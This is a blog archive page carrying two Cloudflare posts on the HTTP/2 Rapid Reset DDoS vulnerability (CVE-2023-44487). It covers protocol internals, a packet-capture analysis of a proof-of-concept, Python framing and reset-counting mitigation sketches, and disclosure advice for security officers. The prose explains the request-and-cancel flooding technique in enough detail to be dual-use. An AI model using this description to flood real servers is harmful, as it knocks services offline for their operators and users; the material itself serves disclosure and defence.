Tag Archives: vulnerabilities

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Post Syndicated from Lucas Pardue original http://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/

Starting on August 25, 2023, we began to notice unusually large HTTP attacks hitting many of our customers. These attacks were detected and mitigated by our automated DDoS system. It was not long, however, before they reached record-breaking sizes, eventually peaking just above 201 million requests per second. This was nearly 3x larger than our previous biggest attack on record.

What is concerning is that the attacker was able to generate such an attack with a botnet of merely 20,000 machines. There are botnets today that are made up of hundreds of thousands or millions of machines. Given that the entire web typically sees only between 1–3 billion requests per second, it's not inconceivable that using this method could focus an entire web's worth of requests on a small number of targets.

Detecting and Mitigating

This was a novel attack vector at an unprecedented scale, but Cloudflare's existing protections were largely able to absorb the brunt of the attacks. While initially we saw some impact to customer traffic — affecting roughly 1% of requests during the initial wave of attacks — today we’ve been able to refine our mitigation methods to stop the attack for any Cloudflare customer without it impacting our systems.

We noticed these attacks at the same time two other major industry players — Google and AWS — were seeing the same. We worked to harden Cloudflare’s systems to ensure that, today, all our customers are protected from this new DDoS attack method without any customer impact. We’ve also participated with Google and AWS in a coordinated disclosure of the attack to impacted vendors and critical infrastructure providers.

This attack was made possible by abusing some features of the HTTP/2 protocol and server implementation details (see CVE-2023-44487 for details). Because the attack abuses an underlying weakness in the HTTP/2 protocol, we believe any vendor that has implemented HTTP/2 will be subject to the attack. This includes every modern web server. We, along with Google and AWS, have disclosed the attack method to web server vendors, who we expect will implement patches. In the meantime, the best defense is using a DDoS mitigation service like Cloudflare’s in front of any web-facing web or API server.

This post dives into the details of the HTTP/2 protocol, the feature that attackers exploited to generate these massive attacks, and the mitigation strategies we took to ensure all our customers are protected. Our hope is that by publishing these details other impacted web servers and services will have the information they need to implement mitigation strategies. And, moreover, the HTTP/2 protocol standards team, as well as teams working on future web standards, can better design them to prevent such attacks.

RST attack details

HTTP is the application protocol that powers the Web. HTTP Semantics are common to all versions of HTTP — the overall architecture, terminology, and protocol aspects such as request and response messages, methods, status codes, header and trailer fields, message content, and much more. Each individual HTTP version defines how semantics are transformed into a "wire format" for exchange over the Internet. For example, a client has to serialize a request message into binary data and send it, then the server parses that back into a message it can process.

HTTP/1.1 uses a textual form of serialization. Request and response messages are exchanged as a stream of ASCII characters, sent over a reliable transport layer like TCP, using the following format (where CRLF means carriage-return and linefeed):

 HTTP-message   = start-line CRLF
                   *( field-line CRLF )
                   CRLF
                   [ message-body ]

For example, a very simple GET request for https://blog.cloudflare.com/ would look like this on the wire:

    GET / HTTP/1.1 CRLF
    Host: blog.cloudflare.com CRLF

And the response would look like:

    HTTP/1.1 200 OK CRLF
    Server: cloudflare CRLF
    Content-Length: 100 CRLF
    Content-Type: text/html; charset=UTF-8 CRLF
    <100 bytes of data>

This format frames messages on the wire, meaning that it is possible to use a single TCP connection to exchange multiple requests and responses. However, the format requires that each message is sent whole. Furthermore, in order to correctly correlate requests with responses, strict ordering is required, meaning that messages are exchanged serially and cannot be multiplexed. Two GET requests, for https://blog.cloudflare.com/ and https://blog.cloudflare.com/page/2/, would be:

    GET / HTTP/1.1 CRLF
    Host: blog.cloudflare.com CRLF
    GET /page/2 HTTP/1.1 CRLF
    Host: blog.cloudflare.com CRLF

With the responses:

    HTTP/1.1 200 OK CRLF
    Server: cloudflare CRLF
    Content-Length: 100 CRLF
    Content-Type: text/html; charset=UTF-8 CRLF
    <100 bytes of data>
    HTTP/1.1 200 OK CRLF
    Server: cloudflare CRLF
    Content-Length: 100 CRLF
    Content-Type: text/html; charset=UTF-8 CRLF
    <100 bytes of data>
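
To make the serial exchange concrete, here is a minimal Python sketch that opens a single TLS connection, writes the two requests back to back, and reads the responses in order. It is purely illustrative: the host is taken from the example above, response parsing is skipped, and many servers no longer accept pipelined requests at all.

    import socket
    import ssl

    HOST = "blog.cloudflare.com"  # example host from the text above

    # One TCP+TLS connection carries both requests, and the responses must
    # come back in the same order; there is no way to receive page 2 first.
    ctx = ssl.create_default_context()
    with socket.create_connection((HOST, 443)) as tcp:
        with ctx.wrap_socket(tcp, server_hostname=HOST) as tls:
            tls.sendall(
                (
                    "GET / HTTP/1.1\r\n"
                    f"Host: {HOST}\r\n"
                    "Connection: keep-alive\r\n"
                    "\r\n"
                    "GET /page/2/ HTTP/1.1\r\n"
                    f"Host: {HOST}\r\n"
                    "Connection: close\r\n"
                    "\r\n"
                ).encode("ascii")
            )
            raw = b""
            while chunk := tls.recv(4096):
                raw += chunk  # both responses arrive serially on this socket
            print(raw[:200])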

Web pages require more complicated HTTP interactions than these examples. When visiting the Cloudflare blog, your browser will load multiple scripts, styles and media assets. If you visit the front page using HTTP/1.1 and decide quickly to navigate to page 2, your browser has two options: either wait for all of the queued-up responses for the page that you no longer want before page 2 can even start, or cancel the in-flight requests by closing the TCP connection and opening a new one. Neither of these is very practical. Browsers tend to work around these limitations by managing a pool of TCP connections (up to 6 per host) and implementing complex request dispatch logic over the pool.

HTTP/2 addresses many of the issues with HTTP/1.1. Each HTTP message is serialized into a set of HTTP/2 frames that have type, length, flags, stream identifier (ID) and payload. The stream ID makes it clear which bytes on the wire apply to which message, allowing safe multiplexing and concurrency. Streams are bidirectional. Clients send frames and servers reply with frames using the same ID.

In HTTP/2 our GET request for https://blog.cloudflare.com would be exchanged across stream ID 1, with the client sending one HEADERS frame, and the server responding with one HEADERS frame, followed by one or more DATA frames. Client requests always use odd-numbered stream IDs, so subsequent requests would use stream ID 3, 5, and so on. Responses can be served in any order, and frames from different streams can be interleaved.
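
To see this framing in practice, here is a minimal sketch using the Python h2 library (an illustrative choice on my part, not the implementation discussed in this post). It serializes the GET request above into the connection preface, a SETTINGS frame and a HEADERS frame on stream 1, ready to be written to a TLS socket.

    # pip install h2
    import h2.config
    import h2.connection

    # Client-side HTTP/2 connection state machine.
    config = h2.config.H2Configuration(client_side=True)
    conn = h2.connection.H2Connection(config=config)
    conn.initiate_connection()  # queues the connection preface and SETTINGS

    # A GET with no body is a single HEADERS frame with END_STREAM set,
    # sent on stream 1. The next request would use stream 3, then 5, and so on.
    conn.send_headers(
        stream_id=1,
        headers=[
            (":method", "GET"),
            (":path", "/"),
            (":scheme", "https"),
            (":authority", "blog.cloudflare.com"),
        ],
        end_stream=True,
    )

    wire_bytes = conn.data_to_send()  # bytes to write to the TCP/TLS socket
    print(f"{len(wire_bytes)} bytes queued for the wire")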

Stream multiplexing and concurrency are powerful features of HTTP/2. They enable more efficient usage of a single TCP connection. HTTP/2 optimizes resource fetching, especially when coupled with prioritization. On the flip side, making it easy for clients to launch large amounts of parallel work can increase the peak demand for server resources when compared to HTTP/1.1. This is an obvious vector for denial-of-service.

In order to provide some guardrails, HTTP/2 provides a notion of maximum active concurrent streams. The SETTINGS_MAX_CONCURRENT_STREAMS parameter allows a server to advertise its limit of concurrency. For example, if the server states a limit of 100, then only 100 requests can be active at any time. If a client attempts to open a stream above this limit, it must be rejected by the server using a RST_STREAM frame. Stream rejection does not affect the other in-flight streams on the connection.
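
Continuing with the same illustrative h2 library, the sketch below shows the server side of this guardrail: advertising SETTINGS_MAX_CONCURRENT_STREAMS at the start of the connection. The value of 100 mirrors the example above; it is not a recommendation.

    # pip install h2
    import h2.config
    import h2.connection
    from h2.settings import SettingCodes

    # Server-side connection: advertise that at most 100 request streams may be
    # active (open or half-closed) at any one time on this connection.
    config = h2.config.H2Configuration(client_side=False)
    conn = h2.connection.H2Connection(config=config)
    conn.initiate_connection()
    conn.update_settings({SettingCodes.MAX_CONCURRENT_STREAMS: 100})

    settings_bytes = conn.data_to_send()  # SETTINGS frame carrying the limit

    # A client that opens a 101st stream while 100 are still active should have
    # that stream refused with RST_STREAM; the other in-flight streams carry on.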

The true story is a little more complicated. Streams have a lifecycle. Below is a diagram of the HTTP/2 stream state machine. Client and server manage their own views of the state of a stream. HEADERS, DATA and RST_STREAM frames trigger transitions when they are sent or received. Although the views of the stream state are independent, they are synchronized.

HEADERS and DATA frames include an END_STREAM flag that, when set to the value 1 (true), can trigger a state transition.

Let's work through this with an example of a GET request that has no message content. The client sends the request as a HEADERS frame with the END_STREAM flag set to 1. The client first transitions the stream from idle to open state, then immediately transitions into half-closed state. The client half-closed state means that it can no longer send HEADERS or DATA, only WINDOW_UPDATE, PRIORITY or RST_STREAM frames. It can receive any frame however.

Once the server receives and parses the HEADERS frame, it transitions the stream state from idle to open and then half-closed, so it matches the client. The server half-closed state means it can send any frame but receive only WINDOW_UPDATE, PRIORITY or RST_STREAM frames.

The response to the GET contains message content, so the server sends HEADERS with END_STREAM flag set to 0, then DATA with END_STREAM flag set to 1. The DATA frame triggers the transition of the stream from half-closed to closed on the server. When the client receives it, it also transitions to closed. Once a stream is closed, no frames can be sent or received.
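
The walkthrough above can be condensed into a small transition table. The following sketch models the client's view of a single stream for just the frames discussed here; the full state machine in the HTTP/2 specification has additional states (such as reserved) and transitions.

    # Simplified client-side view of one HTTP/2 stream. Only the transitions
    # discussed above are modelled; RFC 9113 defines the complete machine.
    TRANSITIONS = {
        # HEADERS with END_STREAM=1 passes through "open" and lands half-closed.
        ("idle",                "send HEADERS(END_STREAM=1)"): "half-closed (local)",
        ("idle",                "send HEADERS"):               "open",
        # Receiving the response headers does not change the client's state.
        ("half-closed (local)", "recv HEADERS"):               "half-closed (local)",
        # The final DATA frame of the response closes the stream.
        ("half-closed (local)", "recv DATA(END_STREAM=1)"):    "closed",
        # RST_STREAM, sent or received, closes the stream immediately.
        ("open",                "send RST_STREAM"):            "closed",
        ("half-closed (local)", "send RST_STREAM"):            "closed",
        ("half-closed (local)", "recv RST_STREAM"):            "closed",
    }

    def next_state(state: str, event: str) -> str:
        """Look up a transition; unknown events leave the state unchanged."""
        return TRANSITIONS.get((state, event), state)

    # The GET example above: request sent, response headers and data received.
    state = "idle"
    for event in ("send HEADERS(END_STREAM=1)", "recv HEADERS", "recv DATA(END_STREAM=1)"):
        state = next_state(state, event)
        print(f"{event:30} -> {state}")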

Applying this lifecycle back into the context of concurrency, HTTP/2 states:

Streams that are in the "open" state or in either of the "half-closed" states count toward the maximum number of streams that an endpoint is permitted to open. Streams in any of these three states count toward the limit advertised in the SETTINGS_MAX_CONCURRENT_STREAMS setting.

In theory, the concurrency limit is useful. However, there are practical factors that hamper its effectiveness, which we will cover later in this post.

HTTP/2 request cancellation

Earlier, we talked about client cancellation of in-flight requests. HTTP/2 supports this in a much more efficient way than HTTP/1.1. Rather than needing to tear down the whole connection, a client can send a RST_STREAM frame for a single stream. This instructs the server to stop processing the request and to abort the response, which frees up server resources and avoids wasting bandwidth.
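
Using the same illustrative h2 library as before, a legitimate cancellation looks like this: the client starts a request, changes its mind, and resets only that stream. The path and host are hypothetical.

    # pip install h2
    import h2.config
    import h2.connection
    from h2.errors import ErrorCodes

    config = h2.config.H2Configuration(client_side=True)
    conn = h2.connection.H2Connection(config=config)
    conn.initiate_connection()

    # Start a request on stream 1 (hypothetical resource and host).
    conn.send_headers(
        stream_id=1,
        headers=[
            (":method", "GET"),
            (":path", "/images/large-photo.webp"),
            (":scheme", "https"),
            (":authority", "example.com"),
        ],
        end_stream=True,
    )

    # The response is no longer needed (say, the image scrolled out of the
    # viewport), so cancel just this stream. The connection and any other
    # in-flight streams are unaffected.
    conn.reset_stream(stream_id=1, error_code=ErrorCodes.CANCEL)

    wire_bytes = conn.data_to_send()  # preface, SETTINGS, HEADERS, RST_STREAM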

Let's consider our previous example of three requests. This time the client cancels the request on stream 1 after all of the HEADERS have been sent. The server parses the RST_STREAM frame before it is ready to serve the response and instead responds only to streams 3 and 5:

Request cancellation is a useful feature. For example, when scrolling a webpage with multiple images, a web browser can cancel images that fall outside the viewport, meaning that images entering it can load faster. HTTP/2 makes this behaviour a lot more efficient compared to HTTP/1.1.

A request stream that is canceled rapidly transitions through the stream lifecycle. The client's HEADERS with the END_STREAM flag set to 1 transitions the state from idle to open to half-closed, then RST_STREAM immediately causes a transition from half-closed to closed.

Recall that only streams that are in the open or half-closed state contribute to the stream concurrency limit. When a client cancels a stream, it instantly gets the ability to open another stream in its place and can send another request immediately. This is the crux of what makes CVE-2023-44487 work.

Rapid resets leading to denial of service

HTTP/2 request cancellation can be abused to rapidly reset an unbounded number of streams. When an HTTP/2 server is able to process client-sent RST_STREAM frames and tear down state quickly enough, such rapid resets do not cause a problem. Where issues start to crop up is when there is any kind of delay or lag in tidying up. The client can churn through so many requests that a backlog of work accumulates, resulting in excess consumption of resources on the server.

A common HTTP deployment architecture is to run an HTTP/2 proxy or load-balancer in front of other components. When a client request arrives it is quickly dispatched and the actual work is done as an asynchronous activity somewhere else. This allows the proxy to handle client traffic very efficiently. However, this separation of concerns can make it hard for the proxy to tidy up the in-process jobs. Therefore, these deployments are more likely to encounter issues from rapid resets.

When Cloudflare's reverse proxies process incoming HTTP/2 client traffic, they copy the data from the connection’s socket into a buffer and process that buffered data in order. As each request is read (HEADERS and DATA frames), it is dispatched to an upstream service. When RST_STREAM frames are read, the local state for the request is torn down and the upstream is notified that the request has been canceled. Rinse and repeat until the entire buffer is consumed. However, this logic can be abused: when a malicious client started sending an enormous chain of requests and resets at the start of a connection, our servers would eagerly read them all and create stress on the upstream servers, to the point of being unable to process any new incoming request.

Something that is important to highlight is that stream concurrency on its own cannot mitigate rapid reset. The client can churn requests to create high request rates no matter the server's chosen value of SETTINGS_MAX_CONCURRENT_STREAMS.

Rapid Reset dissected

Here's an example of rapid reset reproduced using a proof-of-concept client attempting to make a total of 1000 requests. I've used an off-the-shelf server without any mitigations, listening on port 443 in a test environment. The traffic is dissected using Wireshark and filtered to show only HTTP/2 traffic for clarity. Download the pcap to follow along.

It's a bit difficult to see, because there are a lot of frames. We can get a quick summary via Wireshark's Statistics > HTTP2 tool:

The first frame in this trace, in packet 14, is the server's SETTINGS frame, which advertises a maximum stream concurrency of 100. In packet 15, the client sends a few control frames and then starts making requests that are rapidly reset. The first HEADERS frame is 26 bytes long, all subsequent HEADERS are only 9 bytes. This size difference is due to a compression technology called HPACK. In total, packet 15 contains 525 requests, going up to stream 1051.

Interestingly, the RST_STREAM for stream 1051 doesn't fit in packet 15, so in packet 16 we see the server respond with a 404 response.  Then in packet 17 the client does send the RST_STREAM, before moving on to sending the remaining 475 requests.

Note that although the server advertised 100 concurrent streams, both packets sent by the client contained far more HEADERS frames than that. The client did not have to wait for any return traffic from the server; it was only limited by the size of the packets it could send. No server RST_STREAM frames are seen in this trace, indicating that the server did not observe a concurrent stream violation.

Impact on customers

As mentioned above, when requests are canceled, upstream services are notified and can abort them before wasting too many resources. This was the case with this attack, where most malicious requests were never forwarded to the origin servers. However, the sheer size of these attacks did cause some impact.

First, as the rate of incoming requests reached peaks never seen before, we had reports of increased levels of 502 errors seen by clients. This happened on our most impacted data centers as they were struggling to process all the requests. While our network is meant to deal with large attacks, this particular vulnerability exposed a weakness in our infrastructure. Let's dig a little deeper into the details, focusing on how incoming requests are handled when they hit one of our data centers:

We can see that our infrastructure is composed of a chain of different proxy servers with different responsibilities. In particular, when a client connects to Cloudflare to send HTTPS traffic, it first hits our TLS decryption proxy: it decrypts TLS traffic, processes HTTP/1.x, HTTP/2 or HTTP/3 traffic, then forwards it to our "business logic" proxy. That proxy is responsible for loading all the settings for each customer, then routing the requests correctly to other upstream services — and more importantly in our case, it is also responsible for security features. This is where L7 attack mitigation is processed.

The problem with this attack vector is that it manages to send a lot of requests very quickly in every single connection. Each of them had to be forwarded to the business logic proxy before we had a chance to block it. As the request throughput became higher than our proxy capacity, the pipe connecting these two services reached its saturation level in some of our servers.

When this happens, the TLS proxy can no longer connect to its upstream proxy, which is why some clients saw a bare "502 Bad Gateway" error during the most serious attacks. It is important to note that, as of today, the logs used to create HTTP analytics are also emitted by our business logic proxy. The consequence is that these errors are not visible in the Cloudflare dashboard. Our internal dashboards show that about 1% of requests were impacted during the initial wave of attacks (before we implemented mitigations), with peaks of around 12% for a few seconds during the most serious one on August 29th. The following graph shows the ratio of these errors over a two-hour period while this was happening:

We worked to reduce this number dramatically in the following days, as detailed later in this post. Thanks both to changes in our stack and to our mitigations, which reduce the size of these attacks considerably, this number is today effectively zero:

499 errors and the challenges for HTTP/2 stream concurrency

Another symptom reported by some customers is an increase in 499 errors. The reason for this is a bit different and is related to the maximum stream concurrency in an HTTP/2 connection, detailed earlier in this post.

HTTP/2 settings are exchanged at the start of a connection using SETTINGS frames. In the absence of receiving an explicit parameter, default values apply. Once a client establishes an HTTP/2 connection, it can wait for a server's SETTINGS (slow) or it can assume the default values and start making requests (fast). For SETTINGS_MAX_CONCURRENT_STREAMS, the default is effectively unlimited (stream IDs use a 31-bit number space, and requests use odd numbers, so the actual limit is 1073741824). The specification recommends that a server offer no fewer than 100 streams. Clients are generally biased towards speed, so don't tend to wait for server settings, which creates a bit of a race condition. Clients are taking a gamble on what limit the server might pick; if they pick wrong the request will be rejected and will have to be retried. Gambling on 1073741824 streams is a bit silly. Instead, a lot of clients decide to limit themselves to issuing 100 concurrent streams, with the hope that servers followed the specification recommendation. Where servers pick something below 100, this client gamble fails and streams are reset.
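
The sketch below illustrates that client-side gamble in a few lines of Python. The names and the policy are mine for illustration; no particular browser or HTTP library is being described.

    class StreamBudget:
        """Track how many requests a client may have in flight at once."""

        ASSUMED_DEFAULT = 100        # the value most clients bet on

        def __init__(self) -> None:
            self.advertised = None   # unknown until the server's SETTINGS arrives
            self.in_flight = 0

        @property
        def limit(self) -> int:
            return self.advertised if self.advertised is not None else self.ASSUMED_DEFAULT

        def try_start_request(self) -> bool:
            if self.in_flight >= self.limit:
                return False         # queue the request instead of gambling further
            self.in_flight += 1
            return True

        def on_settings(self, max_concurrent_streams: int) -> None:
            # If the server advertises less than the assumed default (say 64),
            # requests already started above that value come back as RST_STREAM
            # and must be retried -- the failure mode described above.
            self.advertised = max_concurrent_streams

    budget = StreamBudget()
    print(sum(budget.try_start_request() for _ in range(120)))  # 100
    budget.on_settings(64)  # the server turned out to be stricter than assumed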

There are many reasons a server might reset a stream beyond concurrency limit overstepping. HTTP/2 is strict and requires a stream to be closed when there are parsing or logic errors. In 2019, Cloudflare developed several mitigations in response to HTTP/2 DoS vulnerabilities. Several of those vulnerabilities were caused by a client misbehaving, leading the server to reset a stream. A very effective strategy to clamp down on such clients is to count the number of server resets during a connection, and when that exceeds some threshold value, close the connection with a GOAWAY frame. Legitimate clients might make one or two mistakes in a connection and that is acceptable. A client that makes too many mistakes is probably either broken or malicious and closing the connection addresses both cases.

While responding to DoS attacks enabled by CVE-2023-44487, Cloudflare reduced maximum stream concurrency to 64. Before making this change, we were unaware that clients don't wait for SETTINGS and instead assume a concurrency of 100. Some web pages, such as an image gallery, do indeed cause a browser to send 100 requests immediately at the start of a connection. Unfortunately, the 36 streams above our limit all needed to be reset, which triggered our counting mitigations. This meant that we closed connections on legitimate clients, leading to a complete page load failure. As soon as we realized this interoperability issue, we changed the maximum stream concurrency to 100.

Actions from the Cloudflare side

In 2019, several DoS vulnerabilities were uncovered related to implementations of HTTP/2. Cloudflare developed and deployed a series of detections and mitigations in response. CVE-2023-44487 is a different manifestation of an HTTP/2 vulnerability. However, to mitigate it we were able to extend the existing protections to monitor client-sent RST_STREAM frames and close connections when they are being used for abuse. Legitimate client uses for RST_STREAM are unaffected.
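
As a rough illustration of that kind of per-connection accounting (and emphatically not Cloudflare's actual implementation), the sketch below uses the h2 library on the server side to count client-sent RST_STREAM frames and close the connection with GOAWAY once an arbitrary threshold is exceeded.

    # pip install h2
    import h2.config
    import h2.connection
    import h2.events
    from h2.errors import ErrorCodes

    MAX_CLIENT_RESETS = 200  # illustrative threshold, not a recommended value

    class ConnectionGuard:
        """Count client-sent RST_STREAM frames and drop abusive connections."""

        def __init__(self) -> None:
            config = h2.config.H2Configuration(client_side=False)
            self.conn = h2.connection.H2Connection(config=config)
            self.conn.initiate_connection()
            self.client_resets = 0

        def handle(self, data: bytes) -> bytes:
            """Feed bytes read from the socket; return bytes to write back."""
            for event in self.conn.receive_data(data):
                if isinstance(event, h2.events.StreamReset) and event.remote_reset:
                    # A handful of cancellations per connection is normal;
                    # thousands in quick succession is the Rapid Reset pattern.
                    self.client_resets += 1
                    if self.client_resets > MAX_CLIENT_RESETS:
                        self.conn.close_connection(
                            error_code=ErrorCodes.ENHANCE_YOUR_CALM
                        )
                        break
            return self.conn.data_to_send()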

In addition to a direct fix, we have implemented several improvements to the server's HTTP/2 frame processing and request dispatch code. Furthermore, the business logic server has received improvements to queuing and scheduling that reduce unnecessary work and improve cancellation responsiveness. Together these lessen the impact of various potential abuse patterns as well as giving more room to the server to process requests before saturating.

Mitigate attacks earlier

Cloudflare already had systems in place to efficiently mitigate very large attacks with less expensive methods. One of them is named "IP Jail". For hyper volumetric attacks, this system collects the client IPs participating in the attack and stops them from connecting to the attacked property, either at the IP level, or in our TLS proxy. This system however needs a few seconds to be fully effective; during these precious seconds, the origins are already protected but our infrastructure still needs to absorb all HTTP requests. As this new botnet has effectively no ramp-up period, we need to be able to neutralize attacks before they can become a problem.

To achieve this we expanded the IP Jail system to protect our entire infrastructure: once an IP is "jailed", not only is it blocked from connecting to the attacked property, it is also forbidden from using HTTP/2 to connect to any other domain on Cloudflare for some time. As such protocol abuses are not possible using HTTP/1.x, this limits the attacker's ability to run large attacks, while any legitimate client sharing the same IP would only see a very small performance decrease during that time. IP-based mitigations are a very blunt tool — this is why we have to be extremely careful when using them at that scale and seek to avoid false positives as much as possible. Moreover, the lifespan of a given IP in a botnet is usually short, so any long-term mitigation is likely to do more harm than good. The following graph shows the churn of IPs in the attacks we witnessed:

As we can see, many new IPs spotted on a given day disappear very quickly afterwards.

As all these actions happen in our TLS proxy at the beginning of our HTTPS pipeline, this saves considerable resources compared to our regular L7 mitigation system. This allowed us to weather these attacks much more smoothly and now the number of random 502 errors caused by these botnets is down to zero.

Observability improvements

Another front on which we are making changes is observability. Returning errors to clients without them being visible in customer analytics is unsatisfactory. Fortunately, a project has been underway to overhaul these systems since long before the recent attacks. It will eventually allow each service within our infrastructure to log its own data, instead of relying on our business logic proxy to consolidate and emit log data. This incident underscored the importance of this work, and we are redoubling our efforts.

We are also working on better connection-level logging, allowing us to spot such protocol abuses much more quickly to improve our DDoS mitigation capabilities.

Conclusion

While this was the latest record-breaking attack, we know it won’t be the last. As attacks continue to become more sophisticated, Cloudflare works relentlessly to proactively identify new threats — deploying countermeasures to our global network so that our millions of customers are immediately and automatically protected.

Cloudflare has provided free, unmetered and unlimited DDoS protection to all of our customers since 2017. In addition, we offer a range of additional security features to suit the needs of organizations of all sizes. Contact us if you’re unsure whether you’re protected or want to understand how you can be.

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks

Post Syndicated from Grant Bourzikas original http://blog.cloudflare.com/zero-day-rapid-reset-http2-record-breaking-ddos-attack/

Earlier today, Cloudflare, along with Google and Amazon AWS, disclosed the existence of a novel zero-day vulnerability dubbed the “HTTP/2 Rapid Reset” attack. This attack exploits a weakness in the HTTP/2 protocol to generate enormous, hyper-volumetric Distributed Denial of Service (DDoS) attacks. Cloudflare has mitigated a barrage of these attacks in recent months, including an attack three times larger than any previous attack we’ve observed, which exceeded 201 million requests per second (rps). Since the end of August 2023, Cloudflare has mitigated more than 1,100 other attacks with over 10 million rps — and 184 attacks that were greater than our previous DDoS record of 71 million rps.

This zero-day provided threat actors with a critical new tool in their Swiss Army knife of vulnerabilities to exploit and attack their victims at a magnitude that has never been seen before. While at times complex and challenging to combat, these attacks allowed Cloudflare the opportunity to develop purpose-built technology to mitigate the effects of the zero-day vulnerability.

If you are using Cloudflare for HTTP DDoS mitigation, you are protected. And below, we’ve included more information on this vulnerability, and resources and recommendations on what you can do to secure yourselves.

Deconstructing the attack: What every CSO needs to know

In late August 2023, our team at Cloudflare noticed a new zero-day vulnerability, developed by an unknown threat actor, that exploits the standard HTTP/2 protocol — a fundamental protocol that is critical to how the Internet and all websites work. This novel zero-day vulnerability attack, dubbed Rapid Reset, leverages HTTP/2’s stream cancellation feature by sending a request and immediately canceling it over and over.  

By automating this trivial “request, cancel, request, cancel” pattern at scale, threat actors are able to create a denial of service and take down any server or application running the standard implementation of HTTP/2. Furthermore, one crucial thing to note about the record-breaking attack is that it involved a modestly-sized botnet, consisting of roughly 20,000 machines. Cloudflare regularly detects botnets that are orders of magnitude larger than this — comprising hundreds of thousands and even millions of machines. For a relatively small botnet to output such a large volume of requests, with the potential to incapacitate nearly any server or application supporting HTTP/2, underscores how menacing this vulnerability is for unprotected networks.

Threat actors used botnets in tandem with the HTTP/2 vulnerability to amplify requests at rates we have never seen before. As a result, our team at Cloudflare experienced some intermittent edge instability. While our systems were able to mitigate the overwhelming majority of incoming attacks, the volume overloaded some components in our network, impacting a small number of customers’ performance with intermittent 4xx and 5xx errors — all of which were quickly resolved.

Once we successfully mitigated these issues and halted potential attacks for all customers, our team immediately kicked off a responsible disclosure process. We entered into conversations with industry peers to see how we could work together to help move our mission forward and safeguard the large percentage of the Internet that relies on our network prior to releasing this vulnerability to the general public.

We cover the technical details of the attack in more detail in a separate blog post: HTTP/2 Rapid Reset: deconstructing the record-breaking attack.

How are Cloudflare and the industry thwarting this attack?

There is no such thing as a “perfect disclosure.” Thwarting attacks and responding to emerging incidents requires organizations and security teams to live by an assume-breach mindset — because there will always be another zero-day, new evolving threat actor groups, and never-before-seen novel attacks and techniques.

This “assume-breach” mindset is a key foundation for information sharing and for ensuring, in instances such as this, that the Internet remains safe. While Cloudflare was experiencing and mitigating these attacks, we were also working with industry partners to guarantee that the industry at large could withstand this attack.

During the process of mitigating this attack, our Cloudflare team developed and purpose-built new technology to stop these DDoS attacks and further improve our own mitigations for this and other future attacks of massive scale. These efforts have significantly increased our overall mitigation capabilities and resiliency. If you are using Cloudflare, we are confident that you are protected.

Our team also alerted web server software partners who are developing patches to ensure this vulnerability cannot be exploited — check their websites for more information.

Disclosures are never one and done. The lifeblood of Cloudflare is to ensure a better Internet, which stems from instances such as these. When we have the opportunity to work with our industry partners and governments to ensure there are no widespread impacts on the Internet, we are doing our part in increasing the cyber resiliency of every organization no matter the size or vertical.

To gain more of an understanding around mitigation tactics and next steps on patching, register for our webinar.

What are the origins of the HTTP/2 Rapid Reset and these record-breaking attacks on Cloudflare?

It may seem odd that Cloudflare was one of the first companies to witness these attacks. Why would threat actors attack a company that has some of the most robust defenses against DDoS attacks in the world?  

The reality is that Cloudflare often sees attacks before they are turned on more vulnerable targets. Threat actors need to develop and test their tools before they deploy them in the wild. Threat actors who possess record-shattering attack methods can have an extremely difficult time testing and understanding how large and effective they are, because they don't have the infrastructure to absorb the attacks they are launching. Because of the transparency that we share on our network performance, and the measurements of attacks they could glean from our public performance charts, this threat actor was likely targeting us to understand the capabilities of the exploit.

But that testing, and the ability to see the attack early, helps us develop mitigations for the attack that benefit both our customers and industry as a whole.

From CSO to CSO: What should you do?

I have been a CSO for over 20 years, on the receiving end of countless disclosures and announcements like this. But whether it was Log4J, SolarWinds, EternalBlue, WannaCry/NotPetya, Heartbleed, or Shellshock, all of these security incidents have a commonality: a tremendous explosion that ripples across the world and creates an opportunity to completely disrupt any of the organizations that I have led, regardless of the industry or the size.

Many of these were attacks or vulnerabilities that we may not have been able to control. But regardless of whether the issue arose from something within my control or not, what has set the successful initiatives I have led apart from those that did not lean in our favor was the ability to respond when zero-day vulnerabilities and exploits like this are identified.

While I wish I could say that Rapid Reset may be different this time around, it is not. I am calling on all CSOs — no matter whether you’ve lived through the decades of security incidents that I have, or this is your first day on the job — this is the time to ensure you are protected and to stand up your cyber incident response team.

We’ve kept the information restricted until today to give as many security vendors as possible the opportunity to react. However, at some point, the responsible thing becomes to publicly disclose zero-day threats like this. Today is that day. That means that after today, threat actors will be largely aware of the HTTP/2 vulnerability, and it will inevitably become trivial to exploit, kicking off the race between defenders and attackers — first to patch vs. first to exploit. Organizations should assume that systems will be tested, and take proactive measures to ensure protection.

To me, this is reminiscent of a vulnerability like Log4J, due to the many variants that are emerging daily and will continue to appear in the weeks, months, and years to come. As more researchers and threat actors experiment with the vulnerability, we may find different variants with even shorter exploit cycles that contain even more advanced bypasses.

And just like Log4J, managing incidents like this isn’t as simple as “run the patch, now you’re done”. You need to turn incident management, patching, and evolving your security protections into ongoing processes — because the patches for each variant of a vulnerability reduce your risk, but they don’t eliminate it.

I don’t mean to be alarmist, but I will be direct: you must take this seriously. Treat this as a full active incident to ensure nothing happens to your organization.

Recommendations for a New Standard of Change

While no one security event is ever identical to the next, there are lessons that can be learned. CSOs, here are my recommendations that must be implemented immediately, not only in this instance but for years to come:

  • Understand your external and partner networks’ external connectivity in order to remediate any Internet-facing systems with the mitigations below.
  • Understand your existing security protections and the capabilities you have to protect against, detect, and respond to an attack, and immediately remediate any issues in your network.
  • Ensure your DDoS protection resides outside of your data center, because if the traffic reaches your data center, it will be difficult to mitigate the DDoS attack.
  • Ensure you have DDoS protection for applications (Layer 7) and ensure you have Web Application Firewalls. Additionally, as a best practice, ensure you have complete DDoS protection for DNS, network traffic (Layer 3) and API firewalls.
  • Ensure web server and operating system patches are deployed across all Internet-facing web servers. Also, ensure all automation, such as Terraform builds and images, is fully patched so that older versions of web servers are not deployed into production over the secure images by accident.
  • As a last resort, consider turning off HTTP/2 and HTTP/3 (likely also vulnerable) to mitigate the threat. This is a last resort only, because there will be significant performance issues if you downgrade to HTTP/1.1.
  • Consider a secondary, cloud-based L7 DDoS protection provider at the perimeter for resilience.

Cloudflare’s mission is to help build a better Internet. If you are concerned about your current state of DDoS protection, we are more than happy to provide you with our DDoS capabilities and resilience for free to mitigate any attempts at a successful DDoS attack. We know the stress that you are facing, as we have fought off these attacks for the last 30 days and made our already best-in-class systems even better.

